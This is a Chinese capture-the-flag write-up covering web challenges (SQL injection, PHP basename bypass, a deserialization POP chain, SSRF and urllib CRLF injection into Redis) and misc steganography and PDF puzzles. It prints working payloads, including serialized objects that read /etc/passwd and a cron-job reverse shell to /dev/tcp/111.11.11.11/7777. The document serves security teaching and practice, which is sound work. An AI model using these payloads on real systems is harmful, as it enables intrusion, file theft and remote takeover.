文章目录
WEB
签到
?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4,5--+
?id=-1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='SQL01'),3,4,5--+
?id=-1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3,4,5--+
?id=-1'union select 1,(select flag from SQL01.users),3,4,5--+
easyzphp
<?phpinclude'pop.php';// Next step in pop.phpif(preg_match('/pop\.php\/*$/i',$_SERVER['PHP_SELF'])){exit("no way!");}if(isset($_GET['source'])){$path=basename($_SERVER['PHP_SELF']);if(!preg_match('/pop.php$/',$path)&&!preg_match('/index.php$/',$path)){exit("nonono!");}highlight_file($path);exit();}?><a href="index.php?source">Source</a>
$_SERVER['PHP_SELF']
:https://www.php.net/manual/zh/reserved.variables.server.phpbasename()
:https://www.php.net/manual/zh/function.basename.php
造成这里的绕过主要是因为
basename()
在
Linux
下,如果取得的文件名开头是非ASCII码范围的字符,则
basename()
会抛弃这个文件名,继续往上一层走,把上一层的文件名取出来,直到获取到正常可显示ASCII字符开头的文件名(
Windows下直接获取
)。
payload:
/index.php/pop.php/%80?source
读取到
pop.php
的源码
<?phperror_reporting(1);classSSRF{public$f;public$hint;publicfunction__invoke(){if(filter_var($this->hint,FILTER_VALIDATE_URL)){$r=parse_url($this->hint);if(!empty($this->f)){if(strpos($this->f,"try")!==false&&strpos($this->f,"pass")!==false){
@include($this->f.'.php');//something in hint.php}else{die("try again!");}if(preg_match('/prankhub$/',$r['host'])){
@$out=file_get_contents($this->hint);echo$out;}else{die("error");}}else{die("try it!");}}else{die("Invalid URL");}}}classAbandon{public$test;public$pop;publicfunction__construct(){$this->test="";$this->pop="";}publicfunction__toString(){return$this->pop['object']->test;}publicfunction__wakeup(){if(preg_match("/flag/i",$this->test)){echo"hacker";$this->test="index.php";}}}classRoute{public$point;publicfunction__construct(){$this->point=array();}publicfunction__get($key){$function=$this->point;return$function();}}if(isset($_POST['object'])){unserialize($_POST['object']);}
$this->hint
只需要是一个有效的URL,且
parse_url($this->hint)['host']==/prankhub$/
PSC:\Users\Administrator\Downloads> php -r "var_dump(parse_url(filter_var('mochu7://prankhub/', FILTER_VALIDATE_URL))['host']);"
Command line code:1:string(8)"prankhub"
Abandon::__construct()->Abandon::__wakeup()->Abandon::__toString()->Route::__get()->SSRF::__invoke()
poc
<?phpclassSSRF{public$f;public$hint;}classAbandon{public$test;public$pop;}classRoute{public$point;}$abandon=newAbandon();$abandon->test=newAbandon();$route=newRoute();$route->point=newSSRF();$route->point->f='trypass';$route->point->hint='mochu7://prankhub/../../../../../../../etc/passwd';$abandon->test->pop=array("object"=>$route);echoserialize($abandon);
object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:49:"mochu7://prankhub/../../../../../../../etc/passwd";}}}}s:3:"pop";N;}
读
hint.php
object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:60:"mochu7://prankhub/../../../../../../../var/www/html/hint.php";}}}}s:3:"pop";N;}
读flag
object=O:7:"Abandon":2:{s:4:"test";O:7:"Abandon":2:{s:4:"test";N;s:3:"pop";a:1:{s:6:"object";O:5:"Route":1:{s:5:"point";O:4:"SSRF":2:{s:1:"f";s:7:"trypass";s:4:"hint";s:57:"mochu7://prankhub/../../../../../../../f1111444449999.txt";}}}}s:3:"pop";N;}
ezpy
扫出一个
/source
得到源码
#!python#!/usr/bin/env python3import os
import urllib
import urllib.request
import urllib.error
import redis as redis
from flask import Flask, request, render_template
app = Flask(__name__)
redis_conn = redis.Redis(host='127.0.0.1', port=6379, password=os.getenv("P"), db=0)@app.route("/getinfo")defgetinfo():
sitename = request.args.get("sitename")
sitename = redis_conn.get(sitename).decode()ifnot sitename.startswith(('http','file')):return"错误:不支持协议"try:return urllib.request.urlopen(sitename).read()except Exception as e:return"错误: "+str(e)@app.route("/setinfo",methods=['POST'])defsetinfo():
username = request.form.get("sitename")
siteurl = request.form.get("siteurl")if redis_conn.set(username,siteurl):return"ok"return"!!!"@app.route("/")defindex():return render_template("index.html")@app.route("/sitelist")defsitelist():return render_template("sitelist.html",sitelist=redis_conn.keys())@app.route("/source")defsource():returnopen("/app/app.py","r").read()if __name__ =='__main__':
app.run(host='0.0.0.0', port=80,debug=False)
有本地的
Redis
,并且给出了密码是环境变量
P
的值,且
siteurl
利用
file
协议可任意文件读取
http://192.168.38.220:8044/setinfo
sitename=env&siteurl=file:///proc/self/environ
拿到Redis的认证密码,就可以做有密码认证的的Redis攻击
注意到这里使用的是
Python 3.7
,且使用了
urllib
模块,而
Python 3.x-3.7.2
版本中的
urllib
存在CRLF攻击
https://www.anquanke.com/post/id/240014#h2-8
那么这里就可以利用
CRLF
做有密码认证的Redis攻击,创建计划任务反弹Shell
https://www.modb.pro/db/65827
http://127.0.0.1:6379/ HTTP/1.1
auth 1bcc23dfc231aac
$8
flushall
*3
$3
set
$1
1
$66
*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"
*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
mochu7:
修改为自己的VPS注意
Bulk Strings
表示的长度,并且要注意闭合原来的HTTP请求。
from urllib.parse import*
payload ='http://127.0.0.1:6379/ HTTP/1.1\r\nauth 1bcc23dfc231aac\r\n$8\r\nflushall\r\n*3\r\n$3\r\nset\r\n$1\r\n1\r\n$66\r\n\r\n\r\n*/1 * * * * bash -c "sh -i >& /dev/tcp/111.11.11.11/7777 0>&1"\r\n\r\n\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$3\r\ndir\r\n$16\r\n/var/spool/cron/\r\n*4\r\n$6\r\nconfig\r\n$3\r\nset\r\n$10\r\ndbfilename\r\n$4\r\nroot\r\n*1\r\n$4\r\nsave\r\n\r\nmochu7:'print(quote(payload))
利用Burp给
/setinfo
传入
sitename
、
siteurl
然后等待反弹shell即可
MISC
byteMuisc
这题运气好抢了个一血
beep.png
末尾发现密码
LSB提取数据
a=64E3,80*(128<t*[[6.5,7.3,8.7,7.3,11,0,0,11,0,0,10,0,0,0,0,0,6.5,7.3,8.2,6.5,10,0,0,10,0,0,8.7,0,0,8.2,7.3,0,6.5,7.3,8.7,7.3,8.7,0,0,0,10,0,8.2,0,0,7.3,6.5,0,0,0,6.5,0,10,0,0,0,8.7,0,0,0,0,0,0,0][int(64*t/a%64)]][int(t/a)%1]%255)*(1-64*t%a/a)
https://www.reddit.com/r/bytebeat/comments/s0b0m0/i_made_the_coolest_music/
https://dollchan.net/bytebeat/index.html
很明显的瑞克摇
PSC:\Users\Administrator> php -r "echo md5('never_gonna_give_you_up');"
daa2c770480cf44a285cd9225de2d522
SangFor{daa2c770480cf44a285cd9225de2d522}
有趣的PDF
hint:
有趣的PDF 1、PDF结构: launchURL 2、js in PDF 3、2021在野漏洞的出题灵感
art.pdf
中嵌套了一个
pdf
,有密码
foremost分离出一张图片
得到信息:
part2: unicode
PDFStreamDumper
发现第一部分密码:
password:baseURL_
得到
where.pdf
的密码:
baseURL_unicode
where.pdf
的JS注释区有一段貌似加密的数据?
之后就不会了,hint提示说是2021在野漏洞,找了半天没啥进展
如果哪位师傅解了这题希望能一起交流下这题,我的联系方式:
UVE6IDIzOTI1MTczNTk=
谢谢^_^
版权归原作者 末初mochu7 所有, 如有侵权,请联系我们删除。